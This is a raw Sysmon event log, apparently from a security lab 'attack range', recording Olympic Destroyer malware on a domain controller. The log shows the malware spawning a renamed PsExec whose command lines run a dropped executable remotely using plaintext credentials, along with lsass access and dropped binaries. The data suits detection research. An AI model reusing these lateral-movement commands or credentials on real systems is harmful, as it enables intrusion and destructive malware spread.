10:57:17.268{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292708Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.268{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292707Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.268{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292706Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.268{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292705Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.268{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-130D-6216-2906-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292704Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.270{C8EA50B7-130D-6216-2906-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292703Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.268{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-130D-6216-2906-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292702Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.153{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-130D-6216-2806-000000003802}6820C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292701Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.153{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292700Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.153{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292699Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.153{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292698Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.153{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292697Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.153{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-130D-6216-2806-000000003802}6820C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292696Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.154{C8EA50B7-130D-6216-2806-000000003802}6820C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292695Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.153{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-130D-6216-2806-000000003802}6820C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292769Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:18.971{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4033C4AD34060DC7239F3592121E6706,SHA256=743D1F56B8FD91F5269838E603AE69FED0F5E6AA726D2943CFDAFE9C4923614E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217795Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:16.456{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51417-false10.0.1.12-8000- 23542300x8000000000000000217794Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.212{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A79B47B63A0C4708562D0D552F924FFD,SHA256=161681EC693CB7D00A214E27415ECE1B6DA942B0E2F323807311A061D5D85B11,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000292768Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localEXE2022-02-23 10:57:18.484{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXEC:\Temp\drop\cjumh.exe2022-02-23 10:57:18.484 11241100x8000000000000000292767Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localEXE2022-02-23 10:57:18.484{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXEC:\Temp\drop\_vea.exe2022-02-23 10:57:18.484 11241100x8000000000000000292766Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localEXE2022-02-23 10:57:18.484{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXEC:\Temp\drop\_tbl.exe2022-02-23 10:57:18.484 11241100x8000000000000000292765Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localEXE2022-02-23 10:57:18.468{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXEC:\Temp\drop\_pwv.exe2022-02-23 10:57:18.468 11241100x8000000000000000292764Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localEXE2022-02-23 10:57:18.468{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXEC:\Temp\drop\qcksh.exe2022-02-23 10:57:18.468 23542300x8000000000000000292763Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:18.420{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=380A1CF64B8382FA40DA496EF7E3C184,SHA256=AFCA2579247DBCC762A1365020C12498832554A0A48C98450D0271BF7DAEAB88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292762Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:18.168{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ECE530E103F4806DD9BD6707B5149F9,SHA256=658E998D6C08E7016EFF3BC048A5F2312017D7C146688E98177B6B31A88B8F53,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000292761Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.868{C8EA50B7-130D-6216-2D06-000000003802}7080C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292760Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.868{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-130D-6216-2D06-000000003802}7080C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292759Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.852{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-130D-6216-2D06-000000003802}7080C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292758Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:17.837{C8EA50B7-130D-6216-2D06-000000003802}7080C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292757Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.784{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-130D-6216-2F06-000000003802}6388C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292756Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.784{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-130D-6216-2F06-000000003802}6388C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292755Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.768{C8EA50B7-130D-6216-2F06-000000003802}63887008C:\Windows\system32\conhost.exe{C8EA50B7-130D-6216-2D06-000000003802}7080C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292754Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.768{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292753Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.768{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292752Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 